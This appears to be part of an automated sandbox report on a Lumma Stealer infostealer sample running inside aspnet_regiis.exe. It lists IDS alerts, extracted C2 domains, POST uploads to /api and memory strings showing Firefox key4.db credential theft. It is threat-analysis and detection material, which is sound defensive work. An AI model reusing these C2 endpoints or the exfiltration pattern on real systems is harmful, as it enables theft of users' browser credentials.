Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-56F603FDh]	3_2_031AC540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-3394892Fh]	3_2_0318958C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_03198DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp dword ptr [031B7A3Ch]	3_2_03198DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0319E5EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp-44h]	3_2_03199129
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 385488F2h	3_2_031964D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	3_2_031774F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	3_2_031774F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	3_2_031AE4E1

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058550 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click) : 192.168.2.6:50384 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.6:49709 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058598 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop) : 192.168.2.6:57016 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058616 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop) : 192.168.2.6:57616 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49898 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49986 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49990 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49989 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49988 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49991 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49993 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49994 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058599 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI) : 192.168.2.6:49992 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49986 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49986 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49988 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49898 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49898 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49994 -> 104.21.96.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: undesirabkel.click

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49898 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49986 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49990 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49989 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49988 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49991 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49993 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49994 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49992 -> 104.21.96.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2MUNY1F2TDRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12824Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4Z5YHEY2OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15058Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AHFIYDV7YKGV8GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19946Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=11I7CUU94REU7W6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 643165Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YJXWJ58MFD0S9MHS2YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1221Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TO4PJTFMAFGJ6OA7YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570636Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: abruptyopsn.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: undesirabkel.click
Source: global traffic	DNS traffic detected: DNS query: nearycrepso.shop
Source: global traffic	DNS traffic detected: DNS query: abruptyopsn.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click

Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: aspnet_regiis.exe, 00000003.00000003.2700922914.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773860884.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2793627901.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773630048.0000000003499000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2725007769.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034AE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2700786138.0000000003499000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.miH
Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2712906052.00000000058C6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2712090796.00000000058B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/
Source: aspnet_regiis.exe, 00000003.00000003.2700805678.0000000003431000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/22h
Source: aspnet_regiis.exe, 00000003.00000003.2738030151.00000000034CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/4
Source: aspnet_regiis.exe, 00000003.00000002.3389991161.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/N
Source: aspnet_regiis.exe, 00000003.00000003.2700805678.000000000345D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/Ow
Source: aspnet_regiis.exe, 00000003.00000003.2725007769.00000000034CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/Y
Source: aspnet_regiis.exe, 00000003.00000003.2712090796.00000000058B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2700805678.0000000003450000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/api
Source: aspnet_regiis.exe, 00000003.00000003.2793627901.00000000034CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/api4
Source: aspnet_regiis.exe, 00000003.00000003.2712090796.00000000058B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/api9v9-
Source: aspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773860884.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2793627901.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2788196527.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783789033.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773630048.0000000003499000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3389965700.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773956570.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/apiB
Source: aspnet_regiis.exe, 00000003.00000003.2712090796.00000000058B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/apiNET;
Source: aspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773860884.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2793627901.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2788196527.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783789033.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773630048.0000000003499000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3389965700.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773956570.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/apid
Source: aspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783789033.00000000034B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/apii
Source: aspnet_regiis.exe, 00000003.00000003.2773956570.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2738030151.00000000034CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/g
Source: aspnet_regiis.exe, 00000003.00000003.2783626201.00000000058C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop:443/apial
Source: aspnet_regiis.exe, 00000003.00000003.2788177021.00000000058C1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2829918442.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3390437810.00000000058C3000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783626201.00000000058C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop:443/apiffxt.default-release/key4.dbPK
Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: aspnet_regiis.exe, 00000003.00000003.2726290907.00000000059D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: aspnet_regiis.exe, 00000003.00000003.2726290907.00000000059D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000003.00000003.2726217533.00000000058EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: aspnet_regiis.exe, 00000003.00000003.2726217533.00000000058EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: aspnet_regiis.exe, 00000003.00000003.2726290907.00000000059D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: aspnet_regiis.exe, 00000003.00000003.2726290907.00000000059D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: aspnet_regiis.exe, 00000003.00000003.2726290907.00000000059D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49898 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49988 version: TLS 1.2
